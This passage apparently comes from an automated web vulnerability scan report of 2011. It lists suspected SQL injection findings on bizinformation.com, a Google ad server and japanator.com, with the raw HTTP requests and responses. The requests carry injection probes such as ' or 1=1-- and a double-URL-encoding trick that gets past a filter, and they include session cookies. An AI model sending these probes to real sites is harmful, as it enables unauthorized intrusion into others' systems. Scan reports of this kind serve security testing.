1.5. http://bizinformation.com/favicon.ico [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 14947488%20or%201%3d1--%20 and 14947488%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?114947488%20or%201%3d1--%20=1 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:16:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 514
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /favicon.ico?114947488%20or%201%3d2--%20=1 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 02:16:05 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 05 Oct 2010 10:04:29 GMT
ETag: "36e0002-e36-491dbc95ca540"
Accept-Ranges: bytes
Content-Length: 3638
Content-Type: image/x-icon

...[SNIP]...

1.6. http://bizinformation.com/images/fl/0.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /images/fl/0.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14518373'%20or%201%3d1--%20 and 14518373'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /images14518373'%20or%201%3d1--%20/fl/0.gif HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:11:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 537
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /images14518373' or 1=1-- /fl/0.gif
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /images14518373'%20or%201%3d2--%20/fl/0.gif HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:11:24 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 533
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /images14518373' or 1=2-- /fl/0.gif was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

1.7. http://bizinformation.com/images/fl/0.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /images/fl/0.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 13133889'%20or%201%3d1--%20 and 13133889'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /images/fl13133889'%20or%201%3d1--%20/0.gif HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:11:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 537
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /images/fl13133889' or 1=1-- /0.gif
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /images/fl13133889'%20or%201%3d2--%20/0.gif HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:11:28 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 533
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /images/fl13133889' or 1=2-- /0.gif was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

1.8. http://bizinformation.com/images/fl/0.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /images/fl/0.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 44557888'%20or%201%3d1--%20 and 44557888'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /images/fl/0.gif44557888'%20or%201%3d1--%20 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:11:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 537
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /images/fl/0.gif44557888' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /images/fl/0.gif44557888'%20or%201%3d2--%20 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:11:32 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 533
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /images/fl/0.gif44557888' or 1=2-- was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

1.9. http://bizinformation.com/images/fl/0.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://bizinformation.com
Path:   /images/fl/0.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 10237900%20or%201%3d1--%20 and 10237900%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /images/fl/0.gif?110237900%20or%201%3d1--%20=1 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 403 Forbidden
Date: Mon, 02 May 2011 02:11:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 518
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /images/fl/0.gif
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

Request 2

GET /images/fl/0.gif?110237900%20or%201%3d2--%20=1 HTTP/1.1
Host: bizinformation.com
Proxy-Connection: keep-alive
Referer: http://bizinformation.co/www.onlinemicrofiche.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 02:11:18 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 514
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /images/fl/0.gif was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at bizinformation.com Port 80</address>
</body></html>

1.10. http://googleads.g.doubleclick.net/pagead/ads [p parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The p parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the p parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /pagead/ads?client=ca-pub-5140108018215676&output=html&h=250&slotname=4535167573&w=300&lmt=1304337375&flash=10.2.154&url=http%3A%2F%2Fwww.japanator.com%2Felephant%2Flogin.phtml&dt=1304319374938&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304319375158&frm=0&adk=556830188&ga_vid=878351806.1304319358&ga_sid=1304319358&ga_hid=1733840726&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&ref=http%3A%2F%2Fwww.japanator.com%2Ffavicon.ico'&fu=0&ifi=2&dtd=463&xpc=6JH0KYKhlO&p=http%3A//www.japanator.com%2527 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 02:46:26 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13006

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#cc0000;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div class=adb>Avoid Failing checkpoints- assignments- finals</div>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-5140108018215676&output=html&h=250&slotname=4535167573&w=300&lmt=1304337375&flash=10.2.154&url=http%3A%2F%2Fwww.japanator.com%2Felephant%2Flogin.phtml&dt=1304319374938&bpp=3&shv=r20110427&jsv=r20110427&correlator=1304319375158&frm=0&adk=556830188&ga_vid=878351806.1304319358&ga_sid=1304319358&ga_hid=1733840726&ga_fc=1&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&ref=http%3A%2F%2Fwww.japanator.com%2Ffavicon.ico'&fu=0&ifi=2&dtd=463&xpc=6JH0KYKhlO&p=http%3A//www.japanator.com%2527%2527 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 02 May 2011 02:46:27 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 13124

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#cc0000;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...

1.11. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant'/index_cblogs-mini.phtml?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:02:51 GMT
Server: lighttpd/1.4.28
Content-Length: 112250


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.12. http://www.japanator.com/elephant/index_cblogs-mini.phtml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/index_cblogs-mini.phtml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/index_cblogs-mini.phtml'?y=community&cblogs=1 HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.2.10.1304319358

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:03:14 GMT
Server: lighttpd/1.4.28
Content-Length: 112250


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.13. http://www.japanator.com/elephant/login.phtml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant'/login.phtml HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 01:59:49 GMT
Server: lighttpd/1.4.28
Content-Length: 112217


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.14. http://www.japanator.com/elephant/login.phtml [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/login.phtml

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

Request

GET /elephant/login.phtml' HTTP/1.1
Host: www.japanator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=166092581.1304319358.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/6; __utma=166092581.878351806.1304319358.1304319358.1304319358.1; __utmc=166092581; __utmb=166092581.1.10.1304319358; __qca=P0-1959175184-1304319359595; __gads=ID=7663cdffe0743e5f:T=1304301360:S=ALNI_MY9hx2TYA5pFIO3VfXdWq6RQ66VSA

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.9
Content-type: text/html
Date: Mon, 02 May 2011 02:00:11 GMT
Server: lighttpd/1.4.28
Content-Length: 112217


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Welcome | Jap
...[SNIP]...
<a href="http://www.japanator.com/first-impressions-moshidora-19325.phtml&mainnav=&track=featurebox" >
...[SNIP]...

1.15. http://www.japanator.com/elephant/signup.phtml [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.japanator.com
Path:   /elephant/signup.phtml

Issue detail

